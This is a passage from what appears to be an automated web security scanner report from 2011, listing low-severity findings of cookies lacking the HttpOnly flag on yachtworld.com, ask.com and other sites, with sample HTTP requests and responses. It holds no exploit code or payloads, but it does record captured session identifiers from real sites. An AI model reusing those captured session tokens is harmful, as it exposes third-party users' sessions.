2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; boats_session_info=session_uom:126:locale_currency_id:100; s_pers=%20s_nr%3D1296157124506%7C1298749124506%3B%20s_lv%3D1296157124508%7C1390765124508%3B%20s_lv_s%3DFirst%2520Visit%7C1296158924508%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.27.10.1296155835;

Response

9.11. https://www.yachtworld.com/boat-loans/consumer_loan_processing.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.yachtworld.com
Path:	/boat-loans/consumer_loan_processing.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=132B8787464974B44186864C9F5B421F.boapp05; Path=/boat-loans; Secure
boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.12. https://www.yachtworld.com/boat-loans/forgot_password.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.yachtworld.com
Path:	/boat-loans/forgot_password.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=F61D5398BBCD60968135F133ABF40C44.boapp05; Path=/boat-loans; Secure
boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.13. https://www.yachtworld.com/boat-loans/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.yachtworld.com
Path:	/boat-loans/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=4B0B0F72E37A07E93F136CA779786D04.boapp05; Path=/boat-loans; Secure
boats_session_info=locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 19:40:02 GMT; Path=/
boats_session_info=session_uom:126:locale_currency_id:100; Domain=.boats.com; Expires=Fri, 27-Jan-2012 19:40:02 GMT; Path=/
boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.14. https://www.yachtworld.com/boat-loans/myLoan.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.yachtworld.com
Path:	/boat-loans/myLoan.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=C49ADEF3AACD827887E2EE0BB766CCF9.boapp05; Path=/boat-loans; Secure
boats_temp_info=lf:ywlf; Domain=.boats.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.15. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PRgo=BBBAAsJvEBVBF4FRCF-19!BDC_!B!BECb!B!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
PRimp=D89A0400-23D3-DE59-0209-448008340105; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRca=|AJsQ*6962:1|AJxY*1039:1|AJd9*1774:1|AJcC*23172:5|AJfG*725:1|AJi6*27:1|AJpL*13875:4|AJn8*424:2|AJpe*396:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcp=|AJsQABoS:1|AJcCAAB5:3|AJcCAACG:1|AJxYAAQl:1|AJd9AA2c:1|AJcCAGBk:1|AJfGAALh:1|AJi6AAA1:1|AJpLADbn:4|AJn8AAGq:2|AJpeAAGY:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpl=|Et92:1|Epn7:1|Epn6:2|FAnn:1|Eyzw:1|Eihq:1|Eoxl:1|EjjU:1|En2h:1|Esyc:2|Esyd:2|EqXr:2|Er3c:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRcr=|FyYt:1|Fy8u:1|Fy8x:1|GAty:1|FwyX:1|Fy9A:3|FsPT:1|FudH:1|FyDo:2|FyKT:2|Fwuw:2|Fyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
PRpc=|Et92FyYt:1|Epn7Fy8u:1|Epn6Fy9A:2|FAnnFy8x:1|EyzwGAty:1|EihqFwyX:1|EoxlFy9A:1|EjjUFsPT:1|En2hFudH:1|EsycFyDo:2|EsydFyKT:2|EqXrFwuw:2|Er3cFyh9:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.16. http://govguru.com/north-carolina/boat-registration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://govguru.com
Path:	/north-carolina/boat-registration

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

symfony=kps8asljqi3bg5vs2c2f13hic0; path=/
loc-1=%2Fnorth-carolina; path=/
siteHost=http://govguru.com; path=/; domain=.govguru.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /north-carolina/boat-registration HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:41:29 GMT
Keep-Alive: timeout=5, max=80
Expires: Fri, 28 Jan 2011 00:41:29 GMT
Connection: close
Set-Cookie: symfony=kps8asljqi3bg5vs2c2f13hic0; path=/
Set-Cookie: loc-1=%2Fnorth-carolina; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 89107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Con
...[SNIP]...

9.17. http://hire.jobvite.com/CompanyJobs/Careers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/Careers.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

guestidc=04748c45-cae2-4fea-a87a-0039dff74982; expires=Sat, 26-Feb-2011 19:13:08 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh HTTP/1.1
Host: hire.jobvite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.18. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s44969984570052 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s44969984570052

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26A0E41C85163315-40000182C057302B[CE]; Expires=Tue, 26 Jan 2016 19:32:09 GMT; Domain=.yachtworld.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.19. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s48372025459539

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; Expires=Tue, 26 Jan 2016 19:16:55 GMT; Domain=.yachtworld.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.20. http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s59107670621015 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.yachtworld.com
Path:	/b/ss/deyachtworld/1/H.17/s59107670621015

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26A0FFE785012E5B-6000010D80001CDA[CE]; Expires=Tue, 26 Jan 2016 23:29:19 GMT; Domain=.yachtworld.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.21. http://www.ask.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

user=o=0&l=dir; Domain=.ask.com; Path=/
puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:12:43 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:12:43 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.22. http://www.ask.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
ldpt=porg=5488|1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.23. http://www.ask.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:52 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:52 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:52 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

9.24. http://www.ask.com/about/legal/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about/legal/privacy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

9.25. http://www.ask.com/about/legal/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about/legal/terms

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ0OjU2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:56 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:44:56 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about/legal/terms HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

9.26. http://www.ask.com/advertise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/advertise

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:53 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 37589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...

9.27. http://www.ask.com/ans previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ans

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:09 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:09 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.28. http://www.ask.com/answers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:26 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:26 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /answers HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

9.29. http://www.ask.com/answers/000/Notification previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers/000/Notification

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ2OjQzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:43 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:46:43 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /answers/000/Notification HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

9.30. http://www.ask.com/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/homepage

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE0OjA1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:05 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:05 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:14:05 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage?q=&o=0&l=dir&page=1 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

9.31. http://www.ask.com/ja-ask-dialog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/ja-ask-dialog

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjMwOjUxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:30:51 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:30:51 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

9.32. http://www.ask.com/pictures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictures

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjM0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:34 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pictures?qsrc=167&o=0&l=dir&q=regulator+boat&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

9.33. http://www.ask.com/pictureslanding previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictureslanding

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pictureslanding HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
